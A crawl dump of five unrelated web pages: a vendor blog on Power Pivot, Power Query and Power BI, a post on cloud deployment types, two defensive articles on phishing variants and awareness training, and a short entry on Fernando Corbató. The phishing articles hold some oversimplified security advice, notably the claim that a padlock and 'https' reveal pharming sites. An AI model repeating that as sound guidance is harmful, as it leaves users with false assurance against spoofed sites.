Power Pivot is an in-memory data modeling component that provides highly compressed data storage and extremely fast aggregation and calculation. It is also available as part of Excel and can be used to create a data model in an Excel workbook. Power Pivot can load data by itself, or data can be loaded into it by Power Query. It is very similar to the SSAS (SQL Server Analysis Services) tabular model, which is essentially the server-side version of Power Pivot.
Power View is an interactive visualization tool that provides users with a drag and drop interface that allows them to quickly and easily create data visualization in their Excel workbooks (using the Power Pivot data model).
Power Pivot is also an add-in for Microsoft Excel, but it is intended for somewhat different tasks. Where Power Query focuses on importing and processing data, Power Pivot is needed mainly for complex analysis of large amounts of data. To a first approximation, you can think of Power Pivot as supercharged pivot tables.
The general principles for working in Power Pivot are as follows:
- First, you load data into Power Pivot — 15 different sources are supported: common databases (SQL Server, Oracle, Access …), Excel files, text files, and data feeds. In addition, you can use Power Query as a data source, which makes the analysis almost omnivorous.
- Next, relationships are configured between the loaded tables or, as they say, the Data Model is created. This later lets you build reports on any fields from the linked tables as if they were a single table.
- If necessary, additional calculations are added to the Data Model with the help of calculated columns (the analog of a formula column in a smart table) and measures (the analog of a calculated field in a pivot table). All of this is written in a special internal Power Pivot language called DAX (Data Analysis eXpressions).
Reports of interest – pivot tables and charts – are then built on an Excel sheet from the Data Model. Power Pivot has several features that make it a unique tool for some tasks:
- In Power Pivot, there is no limit on the number of rows (as there is in Excel). You can load tables of any size and work with them comfortably.
- Power Pivot is very good at compressing data when loading it into the Model. A 50 MB source text file can easily turn into 3-5 MB after loading.
- Since Power Pivot is, under the hood, a full-fledged database engine, it copes with large amounts of information very quickly. Need to analyze 10-15 million records and build a summary report? On an old laptop? No problem!
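As a rough illustration of what a data model relationship plus a measure amounts to (Power Pivot itself uses DAX, not Python), here is a toy sketch with invented data:

```python
# Toy analogue of a Power Pivot data model: two related tables joined on a
# key, with a "measure"-style aggregation on top. All data is invented.
import pandas as pd

sales = pd.DataFrame({
    "product_id": [1, 1, 2, 3, 3, 3],
    "units":      [5, 2, 7, 1, 4, 6],
    "price":      [10.0, 10.0, 25.0, 40.0, 40.0, 40.0],
})
products = pd.DataFrame({
    "product_id": [1, 2, 3],
    "category":   ["paper", "ink", "hardware"],
})

model = sales.merge(products, on="product_id")             # the relationship
model["revenue"] = model["units"] * model["price"]         # calculated column
by_category = model.groupby("category")["revenue"].sum()   # the "measure"
print(by_category)
```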
Combine Power Query and Power Pivot
Power Query and Power Pivot complement each other. Power Query is the recommended tool for locating, connecting to, and importing data. Power Pivot provides the data analysis and data modeling capabilities in Excel and is very convenient for modeling the data you have imported. You can then view and visualize that data using Power Map, Power View, pivot tables, and pivot charts, and interact with the resulting workbook in SharePoint, on Power BI sites in Office 365, and in the Power BI app from the Microsoft Store.
This add-on first appeared in 2013 and was originally called GeoFlow. It is intended for visualization of geo-data, i.e., the numerical information on geographical maps. The source data for the display is taken from the same Power Pivot Data Model (see the previous paragraph).
The demo version of Power Map (almost no different from the full capabilities, by the way) can be downloaded completely free again from the Microsoft website. The full version is included in some Microsoft Office 2013-2016 packages with Power Pivot – as a 3D map button on the Insert tab (Insert – 3D-map):
Key features of the Power Map:
- Maps can be both flat and three-dimensional (globe).
- You can use several different types of visualization (histograms, bubble charts, heatmaps, fill areas).
- You can add a time dimension, i.e., animate the process and watch it develop over time.
Maps are loaded from the Bing Maps service, i.e., you need a working Internet connection to view them. Sometimes there are difficulties with correct recognition of addresses, because names in the data do not always match what Bing Maps expects.
In the full (not demo) version of Power Map, you can use your downloadable maps, for example, to visualize visitors to the shopping center or prices for apartments in a residential building directly on the construction plan.
Based on the created geo-visualizations, you can create videos directly in the Power Map (example), to share them later with those who do not have an add-on installed or include PowerPoint in the presentation.
This add-in first appeared in Excel 2013 and is designed to bring your data to life through interactive graphs, charts, maps, and tables – what are sometimes called dashboards or scorecards. The idea is that you can insert a special sheet without cells into your Excel file – a Power View slide – where you can add text, pictures, and many different types of visualizations built from the data in your Power Pivot Data Model. Here are the nuances:
- The source data is taken from the same place – from the Power Pivot Data Model.
- To work with Power View, you need to install Silverlight on your computer – a Microsoft’s analog of Flash (free).
- On the Microsoft site, by the way, there is a very decent training course on Power View in Russian.
Power BI, Power Query, and Power Pivot are Related.
Here is a simple diagram explaining how these Powerful tools are related:
Unlike previous ones, Power BI is not an add-in for Excel, but a separate product that represents a whole complex of tools for business analysis and visualization. Power BI is a SaaS service that allows business users to serve their own business intelligence needs. It provides built-in connectivity to SaaS services, such as Salesforce and many others. It provides connections to local and cloud sources using a combination of a direct request and periodic data updates. It is available as a freemium service. It is the successor to Power BI for Office 365, based on Microsoft Office 365 and SharePoint Online, and through Excel 2013 it includes Power Query, Power Pivot, and Power View.
Power BI (with Office 365 and SharePoint Online) provides a website where users can upload and share the content they create, manage gateways to corporate data sources, schedule data refreshes, and use advanced features such as Q&A, which allows data models to be queried in natural language. Microsoft also released the standalone Power BI Desktop application, which brings Power Query, Power Pivot, and Power View together in a single application, removing the limitations of Excel 2013. Much of this Power BI functionality can also be achieved on-premises using SQL Server 2012+, Excel 2010+, and SharePoint 2010+ if the cloud is not an option for you.
Power BI Desktop is a program for analyzing and visualizing data, which includes, among other things, all the functionality of Power Query and Power Pivot + add-ons and improved visualization mechanisms from Power View and Power Map. Download and install it for free from the Microsoft website. In Power BI Desktop, you can:
- Download data from more than 70 different sources (as in Power Query + additional connectors).
- Link tables to a model (as in Power Pivot)
- Add additional calculations to data using measures and calculated columns on a DAX (as in Power Pivot)
- To create beautiful interactive reports based on data with different types of visualizations (very similar to Power View, but even better and more Powerful).
- Publish the generated reports on the Power BI Service website (see the next paragraph) and share them with colleagues. And it is possible to give different rights (reading, editing) to different people.
How is Power BI Different from Excel?
So Power Query and Power Pivot in conjunction with Excel can create interactive reports. But there are several crucial differences between Power BI and Excel.
- Power BI allows rich, immersive, and interactive experiences out-of-box. You can click on a bar in a bar chart, and other visuals respond to the event and highlight or filter relevant data. You can show graphs and visuals that are very tricky (or impossible) to reproduce in Excel like maps, pictures, and custom visuals.
Power BI works with large data sets. There is no artificial limit of 1 million rows in Power BI. You can hook up to a business data set and analyze any volume of data. The limit depends on what your computer (or Power BI server) can process.
- Share and read reports easily. You can create reports in Power BI and share them in formats that are universal (i.e., browser pages or apps). This means your boss need not have Excel or Power BI installed to enjoy the beautiful reports you create.
Power BI is for storytelling, while Excel is for almost anything. You can use Excel to simulate pendulum motion, calculate Venus orbit, model a start-up business plan, or many other things. Power BI is mainly for data analysis and storytelling. If you try to replicate a large, intricate financial model or optimization problem with Power BI, you will either fail or suffer miserably. On the other hand, if you use Power BI for making reports, running cool analysis algorithms (clustering, outlier detection, geospatial patterns, etc.), you will wow your colleagues and bosses.
However, with excellence comes complexity. The more you can do with one tool, the more skill it takes to use it. In case you’re just starting with Power BI, you can easily get help by hiring a consultant to show you and your team the proverbial “ropes.” Power BI training services facilitate a smooth transition of the application to your in-house support teams and give them the skills to keep improving your reporting capabilities.
FluentPro Power BI Consulting Services
Our consultants specialize in Microsoft technologies to help your business reap the full benefits of your data. FluentPro’s Power BI Center of Excellence is a professional team of consultants and developers who will provide you with all the needed assistance to make the most out of your investment into the Microsoft Power BI platform. Our Power BI consulting services include:
- BI strategy and business analysis
- Data architecture and integration
- Data modeling, including DAX programming, Power Query ETL implementation, etc.
- Power BI visualization and reports
Our Power BI consulting team has seen a dramatic increase in demand for our services from businesses that want to hire our expertise to use new analytical tools. In addition to our core technologies, we can put together an integrated solution to meet all your requirements. Our Power BI consulting service is based on 10+ years of experience. We’ll define your BI strategy, architect and implement all the needed infrastructure, and turn your data into comprehensive insights to empower decision making. You should consider FluentPro Power BI consulting services to help you with:
- Adoption and implementation of Microsoft BI technologies
- Customizing the Power BI platform to your maximum benefit
- Integrating any data sources and maintain data infrastructure
- Generate business value through data analytics and visualization
- Get an individual approach to each client, no matter the size or the industry of your enterprise
- Get advanced customization that is tailor-made for your team and its needs
- Help with a personal approach to the key people in the organization who want to get started with Power BI.
- Work with people who are available from anywhere in the world.
- Have necessary training delivered to the key Power BI business users to learn the skills needed to succeed.
Schedule a free consultation
to get help with Power BI today | <urn:uuid:020e2ca1-dd1b-4e95-bc86-6f2cbb88b538> | CC-MAIN-2022-40 | https://fluentpro.com/blog/difference-between-power-pivot-power-query-and-power-bi/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00519.warc.gz | en | 0.909197 | 3,252 | 2.703125 | 3 |
What Are Public, Private, and Hybrid Cloud?
Organizations have various methods of deploying cloud resources, namely public, private, and hybrid cloud. Each of the three has its own set of advantages relating to performance, cost-effectiveness, scalability, cloud security practices, and reliability. It is up to each enterprise to decide which of the three to deploy based on its individual requirements. This blog gives you an insight into what public, private, and hybrid cloud are and the differences between them in cloud computing.
Definition of Public Cloud:
Nowadays, cloud computing is a necessity for businesses. Cloud storage space and servers are now managed by third-party cloud service vendors and supplied over the web. Microsoft Azure, Amazon Web Services, Google Cloud, IBM Cloud are some popular examples of public cloud service providers. It is totally their responsibility to handle the cloud infrastructure like hardware, software, and other supporting systems. The benefit of cloud computing is that enterprises can share their storage, hardware, and network details with other cloud accounts or partners. Online accounts and services can be managed by web browsers. The online email, online storage, online Office applications, and the development and testing environments are serviced by the public clouds.
Advantages of Public Clouds:
- Costing Is Less – With public clouds, the enterprises will just have to pay for the services used in their businesses. There is no necessity to purchase any hardware or software with public cloud deployments.
- Maintenance Cost Is Low – The maintenance of cloud storage infrastructure is done by the cloud service provider. The customers have to just enjoy the services offered by the service providers.
- Unlimited Scalability- The enterprises can avail of unlimited scalability resources for meeting their business requirements at a nominal cost.
- Great Reliability- The service providers have a vast network of servers to address failure issues immediately; thus making the public cloud services reliable.
Definition of Private Cloud:
The private cloud can be hosted in two ways:
- The entire storage data center is located in the enterprise itself
- The third-party service provider is given the responsibility to host the storage on behalf of the enterprise
Advantages of Private Clouds:
- Highly Flexible- The enterprise can customize the cloud environment to meet their specific business requirements.
- Much Enhanced Cloud Security- Since the cloud resources are not shared, there are better chances of security control.
- Higher Scalability Features- The private cloud deployment provides better scalability.
Definition of Hybrid Cloud:
A hybrid cloud is a combination of public and private clouds. Data and applications can be moved between the two – from public to private or private to public – which gives greater flexibility in deployment options and higher overall efficiency. The public cloud can be used for high-volume data with lower security requirements, such as web-based email, while the private cloud can hold confidential data and critical operations, such as customers' personal information. A hybrid cloud also offers the option of cloud bursting: the enterprise's applications run on the private cloud until demand is high enough that they 'burst' into the public cloud, giving the enterprise access to additional computing resources on demand.
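As a toy illustration of the bursting logic (the capacity numbers are invented; real platforms make this decision with schedulers and autoscaling policies):

```python
# Toy sketch of "cloud bursting": run on private capacity until demand
# exceeds it, then spill the remainder to the public cloud.
PRIVATE_CAPACITY = 100  # concurrent workloads the private cloud can run

def place_workloads(demand: int) -> dict:
    private = min(demand, PRIVATE_CAPACITY)
    public = max(demand - PRIVATE_CAPACITY, 0)  # the "burst"
    return {"private": private, "public": public}

for demand in (60, 100, 140, 250):
    placement = place_workloads(demand)
    print(f"demand={demand:3d} -> private={placement['private']:3d}, "
          f"burst to public={placement['public']:3d}")
```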
Advantages of Hybrid Clouds:
- Data Control- The enterprises have the benefit of working in the private cloud for sensitive assets.
- Flexibility- The enterprises can opt for the public cloud whenever they need more cloud computing resources.
- Cost-effectiveness- The enterprises have to pay only for the services used in the public cloud; they do not have to pay for the public cloud maintenance charges. There are costs required to maintain a private cloud.
- Ease of Working- Shifting of data from cloud to another takes place in phases and that is a gradual process but not difficult if done properly.
Public private and hybrid cloud are very useful when enterprises understand their cloud computing requirements. The enterprises have to understand the technical concepts of the three and select the best. The security of data in the cloud cannot be compromised even when one among the three is selected. It is best that the enterprises go in for CASB solutions that add an extra layer of security into the confidential data; thus rendering them safe and secure. | <urn:uuid:4d7814c9-4d0a-484e-b020-5f4f68ef1fcb> | CC-MAIN-2022-40 | https://www.cloudcodes.com/blog/differences-public-private-hybrid-cloud.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00519.warc.gz | en | 0.9254 | 862 | 2.546875 | 3 |
With internet access and availability having increased significantly over the past few years, more people now conduct their transactions online. Knowing this, cybercriminals spend considerable amounts of time and money looking for ways to access private personal information or confidential business information for nefarious reasons. Of the many techniques used by cybercriminals to obtain private and confidential information, one of the most endemic is phishing.
With phishing, the cybercriminals do not focus on the security of the network they wish to compromise. These cybercriminals instead look for ways to trick users to offer up their network credentials or other sensitive information; once obtained, these credentials are used by the cybercriminals to penetrate and compromise a network. Successful phishing attacks cost businesses a lot of money. On average, American businesses lose about $500 million to phishing attacks yearly.
There are several variants of phishing attacks that cybercriminals use when trying to compromise a network. This post discusses seven of the most common phishing variations and provides some tips on ensuring that your business is protected against a phishing attack.
1) Email phishing
This is the most common and most widely known phishing variant. With this variant, the cybercriminal sends the unsuspecting user a seemingly innocuous email with an embedded link. Clicking on the link within the email initiates the download of a virus or malware which then infects the user’s device. Following this, the cybercriminal can then steal the user’s credentials and then access the network freely. To increase the chances of the corrupt link being clicked, cybercriminals try to make the email as realistic as possible, often using a name that the user is familiar with as the sender.
Good observation is the best way to safeguard against this phishing variant. Pay close attention to any spelling mistakes or bad grammar in an email as these may be signs of a phishing email. As much as possible, avoid clicking on embedded links within an email; rather you should copy the link and open it in a new web browser. Train your employees how to identify attacks and how to avoid them.
With Vishing, cybercriminals attempt to make users give up their network credentials over the phone. They may claim to be someone in authority, salespeople or account representatives, among others. They are oftentimes very convincing such that unsuspecting users readily offer up their network credentials.
To guard against this phishing variant, you should never provide your credentials to anyone over the phone, especially your password. As a general rule, any request to provide your password over the phone should be treated with suspicion.
Smishing is similar to vishing and email phishing, the only difference being that the user is sent a text message with an embedded link. Once the link is clicked, a virus or malware is downloaded to the user’s device, corrupting it and thereby allowing access to the network.
The only defense against this form of phishing is to avoid clicking links in text messages when you are not familiar with the sender.
With pharming, cybercriminals install malware on a server or computer such that when users type in the correct web address, they are redirected to a bogus site instead. These users, thinking they are on the correct website, then enter their account credentials which are subsequently stolen by the cybercriminals.
Pharming is one of the more difficult variants of phishing to detect. The best way to guard against it is to look for the padlock icon in your browser's address bar and the "s" in https. The absence of these is a strong indicator that a website is not secure.
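For readers who want to script a quick sanity check of the kind described above, here is a minimal sketch using Python's standard ssl module; it simply verifies that the host presents a valid certificate for the hostname you intended to reach (the hostname is just an example):

```python
import socket
import ssl

def has_valid_certificate(hostname: str, port: int = 443) -> bool:
    """Return True if the host completes a TLS handshake with a certificate
    that verifies for this hostname; False otherwise."""
    context = ssl.create_default_context()  # verifies the chain and hostname
    try:
        with socket.create_connection((hostname, port), timeout=5) as sock:
            # The handshake below raises if certificate verification fails.
            with context.wrap_socket(sock, server_hostname=hostname):
                return True
    except (ssl.SSLError, OSError):
        return False

print(has_valid_certificate("example.com"))
```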
5) In-session phishing
With this technique, a fake pop-up is generated as users browse on legitimate websites. The pop-up typically requests for account credentials or other personal information. Users, thinking that the pop-up is tied to the website they are browsing, enter their information which is then retrieved by the cybercriminals.
The best defense against this phishing technique is to always ensure that your browsers have pop-up blockers enabled.
6) Watering-hole attacks
Watering-hole attacks are a passive form of phishing attacks. In this instance, the attackers infect legitimate websites and simply wait for unsuspecting users to access these sites. Once these sites are accessed, the attackers are then able to retrieve the users’ account credentials.
This type of attack is extremely difficult to detect and guard against since the website appears legitimate and there’s no way to identify the phishing attempt.
7) Search engine attack
In this attack, also known as search engine poisoning, cybercriminals manipulate search engine results so that infected websites appear at the top. Users, believing the websites returned by their search to be genuine, enter their credentials into them and, in so doing, hand their account information to the attackers.
This type of attack is also difficult to detect and guard against since a user doesn’t typically think about the websites in the search engine being dangerous to their computer.
With many possible phishing attack vectors through which your network can be compromised, it is important to engage the services of experts who are well versed in these attack techniques. At Cyber Sainik, we know all about the various phishing techniques and how to ensure that you do not become a victim. Contact us today for more information. | <urn:uuid:6354dbe1-0b45-409f-af7a-8861733ce238> | CC-MAIN-2022-40 | https://cybersainik.com/7-of-the-most-common-phishing-attacks-and-how-to-protect-against-them/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00519.warc.gz | en | 0.942805 | 1,119 | 2.71875 | 3 |
Fernando J. Corbató
Fernando J. Corbató was an American pioneer in the field of computer science who is best known as being the father of the password.
Corbató was a physicist whose interests evolved into what would become a burgeoning field in its own right, computer science. As computers grew more capable and dependable, one of Corbató's own creations, the Compatible Time-Sharing System (CTSS), found a widening set of uses, and how to expand its user population securely and practically became immediately important. Toward this end, Corbató took the concept of a password — familiar in the physical world — and applied it to computers. Upon his death in 2019, the Massachusetts Institute of Technology, where the work had been done, credited Corbató with "drastically expanding the usefulness" of computers.
In addition to CTSS, while at MIT's Computation Center from 1963-66, Corbató began work on the Multiplexed Information and Computing Service (Multics), which built upon CTSS's success and could serve a much larger population of users. Multics, in turn, went on to influence the design of the UNIX operating system.
“Fernando J. Corbató applied the use of a closely-held mutual secret — the password — to the novel challenge of how to manage multiple users of a computer. This paved the way for expanded uses of computers across the enterprise and later, with the emergence or the web, large user populations.” | <urn:uuid:01e1fc98-2d31-4e7a-b36b-6e0ad1a42c3e> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/fernando-j-corbato | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00519.warc.gz | en | 0.942392 | 325 | 3.28125 | 3 |
Phishing attacks are one of the most dangerous, and the most common, email threats that modern organizations are facing, with lost or stolen credentials accounting for a quarter of all successful breaches as attackers continue to exploit our dependence on email communication in an increasingly digital world. But what do phishing attempts look like?
Traditional phishing emails target hundreds of recipients at a time. They trick users into opening a link to a webpage where they’re asked to enter personal information. As we’ve learned about their existence, though, we’ve become better at ignoring or reporting phishing emails. However, attackers have developed a more targeted method of phishing: spear-phishing. This is where it becomes personal. The attacker impersonates someone that you trust, such as a regular stakeholder, so that you’re less likely to question them when they ask you for sensitive information.
And as phishing attacks become more sophisticated, security teams need to implement more sophisticated protection to stop their users from falling for a malicious lure. The best way to do this is to implement multiple layers of security that combine technical protection, such as a Secure Email Gateway or cloud email security solution, with human intelligence, such as phishing awareness training.
What Is Phishing Awareness Training?
Sophisticated phishing attacks can slip through even the most powerful email gateway solutions to target end users directly. As the threat of these attacks grows, organizations are looking for new ways to protect their users. One way of doing this is by implementing awareness training.
Phishing awareness training teaches users how to identify suspicious emails and how to apply best practices in response to receiving them. It usually involves users taking a virtual training course made up of scenario-based videos and quizzes. Once they've completed the course, users are tested with simulated phishing emails. If they don't report the emails, administrators can assign them further training.
Why Does Phishing Awareness Training Work?
Phishing awareness training cultivates a security-first mindset that prioritizes data protection and network security. It does this by providing employees with the knowledge and tools they need to combat phishing attacks. Carefully designed programs teach users how to detect and react to threats so that they can help protect sensitive data, rather than being considered an easy way into an organization’s network.
It’s thanks to powerful training and simulation solutions that recent years have seen a decrease in phishing click rates and an increase in reporting rates, despite the volume of phishing attacks increasing year on year.
What Features Should You Look For In a Phishing Awareness Training Platform?
There are a number of different phishing awareness training solutions out there, and it can be difficult to know which one is best suited to your needs. The most effective solutions include the following features, so keeping an eye out for these is a good place to start:
- A multi-media content library that’s regularly updated. Note the emphasis on “multi-media”! Your employees will all have individual learning styles, so a variety of materials will make sure that the material is engaging for everyone. And when the library is regularly updated, you can be sure that it will contain information on the newest threats that organizations are facing.
- Customization. It’s important that you can build learning paths or tailor modules to target specific threats that your organization is facing. It’s also important that simulated phishing emails designed to test employees can be customized to mimic the types of emails your employees typically receive.
- Interactivity. Quizzes, tests and gamification are sure-fire ways to increase user engagement which, in turn, increases information retention. This means that your employees will remember what they’ve learned and be much more likely to put it into practice.
- Simulations. You need to be able to test what your employees have learned, and the best way to do this is through simulated phishing emails. Users should report these emails, either through the solution’s inbuilt reporting button (see below) or by contacting their IT desk, but if they don’t, they’ll be directed to a landing page that explains their mistake.
- A “Report Phishing” button. These inbox plugins allow users to report not only simulated phishing emails, but also genuine threats, to their IT department. They’re a quick and easy way to flag suspicious content. The best simulations go a step further, with automated analysis based on reported phishing attempts, and triaging of reported emails. Agari’s 2020 Phishing Incident Response Survey found that 67% of all reported incidents were false positives, i.e. not real threats at all. Automated analysis saves security teams valuable time by separating false positives from genuine threats, then prioritizing these threats.
- Admin reporting tools. The best simulation solutions include admin reporting so that you can see who is falling for simulated threats. This means that you can direct those employees towards specific training materials, and re-test them in future simulations.
You know how your organization works and which of the above features will be most useful for the way in which you operate but, generally, it’s a good idea to find a solution that incorporates all of them.
There isn’t a single “silver bullet” solution that will offer full protection against phishing threats. It’s important that we implement a multi-layered solution, combining technical and human protection. With phishing awareness training and simulations, you can transform your employees from potential victims into a solid line of defense against phishing threats.
If you’d like some advice on which solutions will work best for your organization, take a look at our guide to the Top 10 Phishing Awareness Training and Simulation Solutions. | <urn:uuid:ea16ce79-6e99-4207-8b0c-29fd14d29eba> | CC-MAIN-2022-40 | https://expertinsights.com/insights/phishing-awareness-training-why-it-works-and-how-to-choose-the-right-platform/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00519.warc.gz | en | 0.948963 | 1,203 | 2.921875 | 3 |